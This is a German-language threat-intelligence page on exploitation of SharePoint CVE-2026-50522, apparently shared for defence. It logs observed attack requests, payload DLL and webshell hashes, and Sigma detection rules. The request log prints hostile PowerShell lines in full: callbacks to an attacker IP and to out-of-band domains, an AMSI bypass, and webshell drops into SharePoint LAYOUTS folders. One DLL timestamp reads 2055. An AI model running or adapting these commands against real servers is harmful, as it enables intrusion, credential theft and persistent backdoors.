Zurück zu den Updates
UpdatedAug 4, 2026

CVE-2026-50522 — Updated!

Microsoft SharePoint CVE-2026-50522

Teilen

CVE-2026-50522

Microsoft SharePoint CVE-2026-50522 Payloads und Analyse.

HTTP-Anfragen

requestsrcuser-agentencodingunique idpayload
81697888245.63.58.216Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'urn:unique-id:securitycontext:b764f8e60e90450b8629b5ce74fccf82powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing 'http://45.63.58.216:80/b764f8e60e90450b8629b5ce74fccf82'
818198798146.19.216.119Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.26100.33158'urn:unique-id:securitycontext:2965f1ebb795466c82f01142ca764efaMain.dll
819557248Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"urn:unique-id:securitycontext:8e1a54521f004b19880a4823bcdd3a94ayhmu2nq.dll
819736316165.154.199.52Mozilla/5.0'urn:uid:f7e4a5a8041648ef88f4befd099b1c61eze1fcmh.dll
82202661089.117.94.35Python-urllib/3.12"urn:unique-id:securitycontext:77b2293ba0f5464db990f3d2ae402698ActivitySurrogateDisableTypeCheck
82202661689.117.94.35Python-urllib/3.12"urn:unique-id:securitycontext:401e5797f3864092a836f92976a6506fedm3ysnc.dll
822486322199.91.221.39Mozilla/5.0 (compatible; SPOOB/1.0)"urn:unique-id:securitycontext:0e5062c6139e48e3bd951e88b3165a48opctzxj4.dll
822730890199.91.221.39Mozilla/5.0 (compatible; SPMKScan/1.1)"urn:unique-id:securitycontext:64ca3f7733c04b8cbcd859e1c08ebb54ko5ybodq.dll
823155656175.137.255.204Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"urn:unique-id:securitycontext:6ae69a0ebb7c4b66b7e8cc6f232a7ce3powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing 'http://d9k41hj3d47lhf7hbhlg6enhdi7tqb3uk.oast.me/206.255.76.17'
823277752103.151.172.73Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"urn:unique-id:securitycontext:ed252fcd4481466d9f70d3a693a9d073nslookup 9ac2293c.log.dnslog.pp.ua
82345241438.175.103.78Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"urn:unique-id:securitycontext:50fe1b81594845f293362037b3b4b32d`powershell.exe -NoProfile -NonInteractive -Command $ErrorActionPreference='SilentlyContinue';$a=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');if($a){$f=$a.GetField('amsiInitFailed','NonPublic,Static');if($f){$f.SetValue($null,$true)}};$c=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('[SNIP ERROR.aspx webshell'));$dirs=@('C:\inetpub\wwwroot\wss\VirtualDirectories','C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\TEMPLATE\LAYOUTS','C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS');foreach($d in $dirs){if(Test-Path $d){Get-ChildItem $d -Recurse -Directory -ErrorAction SilentlyContinue
824307296190.5.224.135Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"urn:unique-id:securitycontext:0584ba10642c43e2850bff4122a81514powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -EncodedCommand JABFAHIAcgBv[SNIP], `$ErrorActionPreference='SilentlyContinue';$ProgressPreference='SilentlyContinue';$webshellB64='[SNIP default_settings.aspx webshell]';$msg='NOPATH';$done=$false;@('16','15')

Payloads

DateinameDatei-Hash SHA-256Erstellungszeit (UTC)Hinweise
14e2gtsh.dll8bd04f0213c39f07c4baa283375017463e20642545a6fefcbcb6d792c7ee6d9d2026-07-24 03:00:13Gibt MachineKeys zurück
ayhmu2nq.dlledb087336f22a152d9023416b60ee74db2d30e5df52f2166f5dd1b4ae70aa2eb2026-07-24 01:47:55Aktiviert WinRM mit CompatibilityHttpsListener, fügt Benutzer sp_admin hinzu und fügt ihn der lokalen Gruppe Administratoren hinzu
b4tg4ktk.dll824052c860945c1bda536f20318429240319f4f59bc4cf8740a0d6bffe2b99662026-07-23 07:53:59Gibt MachineKeys und Statuscode 200 zurück
bwd0vdqa.dllafce3e097f06e1c5e4dd3422dd7ebc6615a94b111a8b7ab5333071fbb1ecbb352026-07-23 02:54:54Gibt MachineKeys zurück
edm3ysnc.dll91d18bcd4532c7f64a220ca65971e2a41d435148e4ac9811bfc33d2a8fb705492026-07-22 10:54:43Gibt MachineKeys zurück
eze1fcmh.dll02fe5d24867227cb4bff7d3f019d804a19158e3de1de0729fdd067aae55b0bbd2026-07-24 02:37:59Schreibt Webshell/Backdoor cmRANDOM.aspx
hyyavam5.dll74c205b86a8c0884d968225e20db2624164021df14987bc7f602a9ed45ed6c8f2026-07-26 03:20:01
jflyahz3.dll352e47e996a1b43250a4462fa259e12b1fee726abe1be42f1806b30be94591512026-07-23 07:15:43Gibt MachineKeys zurück
ko5ybodq.dll249fea110682ff603bf24f9c1147eae73642b186c7a23022d5f824498b8fcd662026-07-27 14:41:06
Main.dll7baf220eb89f2a216fcb2d0e9aa021b2a10324f0641caf8b7a9088e4e45bec952055-02-11 11:16:12Gibt MachineKeys zurück. Payload wurde zuvor während der ToolShell-Kampagne verwendet.
obdw11tn.dll2ed05c2ff5977047a5aa779510983f7f27b1fde8a0ce6ac8611341eea55f9e372025-07-29 08:50:39Gibt MachineKeys zurück
opctzxj4.dllf5c8c39b29d061d72eaefcf1ff19511bdab5d4b3c9849df4ead07dbe61364ee22026-07-27 15:32:46
tyt0qmyy.dll46e5aedd0e699bf0a3ad8f8cd67d79b51d65ce77e02ff96a49617d5c8c3fe4d72026-07-20 08:55:23Gibt HTTP-Antwortheader sec-ch-ua-mobile: ?1 zurück
z1zkfu55.dllab2e01650b20787dd940475041f83f19c4e025988fcf8aab443ca607003da0122026-07-26 04:49:55
gzlzbkhj.dll52f4af0401258daa9a278710145a9d0d67a35147f0ea136b88684362953489332026-07-25 14:08:17
qho14tqo.dll814db355b4a03fbd6fa138b37a04dd5ff24d9bc5d15e24474f149b220e9c60782026-07-23 06:58:36

Webshells

DateinameDatei-Hash SHA-256Hinweise
cmRANDOM.aspx450839ecab9cb5595b4f6088e7b16d7ea3a5289f2afcc7ae89c041ae046e2511Webshell „Helper Tool" und Dateiname cm{RANDOM}.aspx. Ausgeführte Payloads werden im Speicher mittels Assembly.Load(assemblyBytes) ausgeführt. Der Dateiname wird randomisiert.
default_settings.aspxf72a4d95b4c49bb9ffac869d2a30d829f2519d2f6a1a86bcea54dbeffc34f550Webshell-Speicherort TEMPLATE\LAYOUTS oder \wss\VirtualDirectories\
error.aspx291dc1f15143c2c87fd2257b6145069914bdffa2f6be9afa63169f8661d9cc4bWebshell-Speicherort C:\inetpub\wwwroot\wss\VirtualDirectories, C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\TEMPLATE\LAYOUTS, C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS.
layout2sp.aspxd7ba3ef04a5809d6c672a13bbd7d6a3fc6317faeefbae98bec437ade0475a597Webshell-Speicherort \TEMPLATE\LAYOUTS\layout2sp.aspx.

Erkennungen

Die Erkennungen wurden nicht mit tatsächlichen Protokollen verifiziert.

TypRegelHinweise
SigmaDNS Query to External Service Interaction DomainsErkennt ausgehende DNS-Abfragen für die Callback-Domains wie .log.dnslog.pp.ua, .oast.me, .oastify.com.
SigmaNew User Created Via Net.EXEErkennt neue Benutzer, die mit net.exe hinzugefügt wurden.
SigmaPotential WMI Lateral Movement WmiPrvSE Spawned PowerShellErkennt laterale Bewegung über WMI.
SigmaSuspicious File Write to SharePoint Layouts DirectoryErkennt Dateischreibvorgänge in den SharePoint-Ordner \TEMPLATE\LAYOUTS\.
SigmaSuspicious PowerShell Parent ProcessErkennt Prozessstart von powershell.exe durch w3wp.exe.
SigmaSuspicious Process By Web Server ProcessErkennt verdächtige Prozesse, die von w3wp.exe gestartet wurden.
SigmaSuspicious Processes Spawned by WinRMErkennt verdächtige Prozesse, einschließlich Shells, die vom WinRM-Hostprozess gestartet wurden.
SigmaWebshell Detection With Command Line KeywordsErkennt bestimmte Befehlszeilenparameter, die häufig bei Aufklärungsaktivitäten über Webshells verwendet werden.
SigmaWebshell Hacking Activity PatternsErkennt bestimmte Kindprozesse von w3wp.exe

Kategorien